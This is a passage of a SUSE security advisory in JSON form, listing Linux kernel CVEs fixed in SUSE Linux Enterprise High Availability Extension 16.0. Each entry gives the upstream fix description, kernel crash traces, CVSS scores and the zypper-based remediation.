"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68797"
},
{
"cve": "CVE-2025-68798",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68798"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/amd: Check event before enable to avoid GPF\n\nOn AMD machines cpuc-\u003eevents[idx] can become NULL in a subtle race\ncondition with NMI-\u003ethrottle-\u003ex86_pmu_stop().\n\nCheck event for NULL in amd_pmu_enable_all() before enable to avoid a GPF.\nThis appears to be an AMD only issue.\n\nSyzkaller reported a GPF in amd_pmu_enable_all.\n\nINFO: NMI handler (perf_event_nmi_handler) took too long to run: 13.143\n msecs\nOops: general protection fault, probably for non-canonical address\n 0xdffffc0000000034: 0000 PREEMPT SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x00000000000001a0-0x00000000000001a7]\nCPU: 0 UID: 0 PID: 328415 Comm: repro_36674776 Not tainted 6.12.0-rc1-syzk\nRIP: 0010:x86_pmu_enable_event (arch/x86/events/perf_event.h:1195\n arch/x86/events/core.c:1430)\nRSP: 0018:ffff888118009d60 EFLAGS: 00010012\nRAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000\nRDX: 0000000000000034 RSI: 0000000000000000 RDI: 00000000000001a0\nRBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000002\nR13: ffff88811802a440 R14: ffff88811802a240 R15: ffff8881132d8601\nFS: 00007f097dfaa700(0000) GS:ffff888118000000(0000) GS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00000000200001c0 CR3: 0000000103d56000 CR4: 00000000000006f0\nCall Trace:\n \u003cIRQ\u003e\namd_pmu_enable_all (arch/x86/events/amd/core.c:760 (discriminator 2))\nx86_pmu_enable (arch/x86/events/core.c:1360)\nevent_sched_out (kernel/events/core.c:1191 kernel/events/core.c:1186\n kernel/events/core.c:2346)\n__perf_remove_from_context (kernel/events/core.c:2435)\nevent_function (kernel/events/core.c:259)\nremote_function (kernel/events/core.c:92 (discriminator 1)\n kernel/events/core.c:72 (discriminator 1))\n__flush_smp_call_function_queue (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207 ./include/trace/events/csd.h:64\n kernel/smp.c:135 kernel/smp.c:540)\n__sysvec_call_function_single (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207\n ./arch/x86/include/asm/trace/irq_vectors.h:99 arch/x86/kernel/smp.c:272)\nsysvec_call_function_single (arch/x86/kernel/smp.c:266 (discriminator 47)\n arch/x86/kernel/smp.c:266 (discriminator 47))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68798",
"url": "https://www.suse.com/security/cve/CVE-2025-68798"
},
{
"category": "external",
"summary": "SUSE Bug 1256689 for CVE-2025-68798",
"url": "https://bugzilla.suse.com/1256689"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68798"
},
{
"cve": "CVE-2025-68799",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68799"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncaif: fix integer underflow in cffrml_receive()\n\nThe cffrml_receive() function extracts a length field from the packet\nheader and, when FCS is disabled, subtracts 2 from this length without\nvalidating that len \u003e= 2.\n\nIf an attacker sends a malicious packet with a length field of 0 or 1\nto an interface with FCS disabled, the subtraction causes an integer\nunderflow.\n\nThis can lead to memory exhaustion and kernel instability, potential\ninformation disclosure if padding contains uninitialized kernel memory.\n\nFix this by validating that len \u003e= 2 before performing the subtraction.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68799",
"url": "https://www.suse.com/security/cve/CVE-2025-68799"
},
{
"category": "external",
"summary": "SUSE Bug 1256643 for CVE-2025-68799",
"url": "https://bugzilla.suse.com/1256643"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68799"
},
{
"cve": "CVE-2025-68800",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68800"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats\n\nCited commit added a dedicated mutex (instead of RTNL) to protect the\nmulticast route list, so that it will not change while the driver\nperiodically traverses it in order to update the kernel about multicast\nroute stats that were queried from the device.\n\nOne instance of list entry deletion (during route replace) was missed\nand it can result in a use-after-free [1].\n\nFix by acquiring the mutex before deleting the entry from the list and\nreleasing it afterwards.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\nRead of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043\n\nCPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full)\nHardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017\nWorkqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum]\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xba/0x110\n print_report+0x174/0x4f5\n kasan_report+0xdf/0x110\n mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nAllocated by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x8f/0xa0\n mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x70\n __kasan_slab_free+0x43/0x70\n kfree+0x14e/0x700\n mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68800",
"url": "https://www.suse.com/security/cve/CVE-2025-68800"
},
{
"category": "external",
"summary": "SUSE Bug 1256646 for CVE-2025-68800",
"url": "https://bugzilla.suse.com/1256646"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68800"
},
{
"cve": "CVE-2025-68801",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68801"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_router: Fix neighbour use-after-free\n\nWe sometimes observe use-after-free when dereferencing a neighbour [1].\nThe problem seems to be that the driver stores a pointer to the\nneighbour, but without holding a reference on it. A reference is only\ntaken when the neighbour is used by a nexthop.\n\nFix by simplifying the reference counting scheme. Always take a\nreference when storing a neighbour pointer in a neighbour entry. Avoid\ntaking a referencing when the neighbour is used by a nexthop as the\nneighbour entry associated with the nexthop already holds a reference.\n\nTested by running the test that uncovered the problem over 300 times.\nWithout this patch the problem was reproduced after a handful of\niterations.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_neigh_entry_update+0x2d4/0x310\nRead of size 8 at addr ffff88817f8e3420 by task ip/3929\n\nCPU: 3 UID: 0 PID: 3929 Comm: ip Not tainted 6.18.0-rc4-virtme-g36b21a067510 #3 PREEMPT(full)\nHardware name: Nvidia SN5600/VMOD0013, BIOS 5.13 05/31/2023\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xa0\n print_address_description.constprop.0+0x6e/0x300\n print_report+0xfc/0x1fb\n kasan_report+0xe4/0x110\n mlxsw_sp_neigh_entry_update+0x2d4/0x310\n mlxsw_sp_router_rif_gone_sync+0x35f/0x510\n mlxsw_sp_rif_destroy+0x1ea/0x730\n mlxsw_sp_inetaddr_port_vlan_event+0xa1/0x1b0\n __mlxsw_sp_inetaddr_lag_event+0xcc/0x130\n __mlxsw_sp_inetaddr_event+0xf5/0x3c0\n mlxsw_sp_router_netdevice_event+0x1015/0x1580\n notifier_call_chain+0xcc/0x150\n call_netdevice_notifiers_info+0x7e/0x100\n __netdev_upper_dev_unlink+0x10b/0x210\n netdev_upper_dev_unlink+0x79/0xa0\n vrf_del_slave+0x18/0x50\n do_set_master+0x146/0x7d0\n do_setlink.isra.0+0x9a0/0x2880\n rtnl_newlink+0x637/0xb20\n rtnetlink_rcv_msg+0x6fe/0xb90\n netlink_rcv_skb+0x123/0x380\n netlink_unicast+0x4a3/0x770\n netlink_sendmsg+0x75b/0xc90\n __sock_sendmsg+0xbe/0x160\n ____sys_sendmsg+0x5b2/0x7d0\n ___sys_sendmsg+0xfd/0x180\n __sys_sendmsg+0x124/0x1c0\n do_syscall_64+0xbb/0xfd0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n[...]\n\nAllocated by task 109:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7b/0x90\n __kmalloc_noprof+0x2c1/0x790\n neigh_alloc+0x6af/0x8f0\n ___neigh_create+0x63/0xe90\n mlxsw_sp_nexthop_neigh_init+0x430/0x7e0\n mlxsw_sp_nexthop_type_init+0x212/0x960\n mlxsw_sp_nexthop6_group_info_init.constprop.0+0x81f/0x1280\n mlxsw_sp_nexthop6_group_get+0x392/0x6a0\n mlxsw_sp_fib6_entry_create+0x46a/0xfd0\n mlxsw_sp_router_fib6_replace+0x1ed/0x5f0\n mlxsw_sp_router_fib6_event_work+0x10a/0x2a0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nFreed by task 154:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x60\n __kasan_slab_free+0x43/0x70\n kmem_cache_free_bulk.part.0+0x1eb/0x5e0\n kvfree_rcu_bulk+0x1f2/0x260\n kfree_rcu_work+0x130/0x1b0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nLast potentially related work creation:\n kasan_save_stack+0x30/0x50\n kasan_record_aux_stack+0x8c/0xa0\n kvfree_call_rcu+0x93/0x5b0\n mlxsw_sp_router_neigh_event_work+0x67d/0x860\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68801",
"url": "https://www.suse.com/security/cve/CVE-2025-68801"
},
{
"category": "external",
"summary": "SUSE Bug 1256653 for CVE-2025-68801",
"url": "https://bugzilla.suse.com/1256653"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68801"
},
{
"cve": "CVE-2025-68802",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68802"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe: Limit num_syncs to prevent oversized allocations\n\nThe exec and vm_bind ioctl allow userspace to specify an arbitrary\nnum_syncs value. Without bounds checking, a very large num_syncs\ncan force an excessively large allocation, leading to kernel warnings\nfrom the page allocator as below.\n\nIntroduce DRM_XE_MAX_SYNCS (set to 1024) and reject any request\nexceeding this limit.\n\n\"\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 1217 at mm/page_alloc.c:5124 __alloc_frozen_pages_noprof+0x2f8/0x2180 mm/page_alloc.c:5124\n...\nCall Trace:\n \u003cTASK\u003e\n alloc_pages_mpol+0xe4/0x330 mm/mempolicy.c:2416\n ___kmalloc_large_node+0xd8/0x110 mm/slub.c:4317\n __kmalloc_large_node_noprof+0x18/0xe0 mm/slub.c:4348\n __do_kmalloc_node mm/slub.c:4364 [inline]\n __kmalloc_noprof+0x3d4/0x4b0 mm/slub.c:4388\n kmalloc_noprof include/linux/slab.h:909 [inline]\n kmalloc_array_noprof include/linux/slab.h:948 [inline]\n xe_exec_ioctl+0xa47/0x1e70 drivers/gpu/drm/xe/xe_exec.c:158\n drm_ioctl_kernel+0x1f1/0x3e0 drivers/gpu/drm/drm_ioctl.c:797\n drm_ioctl+0x5e7/0xc50 drivers/gpu/drm/drm_ioctl.c:894\n xe_drm_ioctl+0x10b/0x170 drivers/gpu/drm/xe/xe_device.c:224\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:598 [inline]\n __se_sys_ioctl fs/ioctl.c:584 [inline]\n __x64_sys_ioctl+0x18b/0x210 fs/ioctl.c:584\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xbb/0x380 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n...\n\"\n\nv2: Add 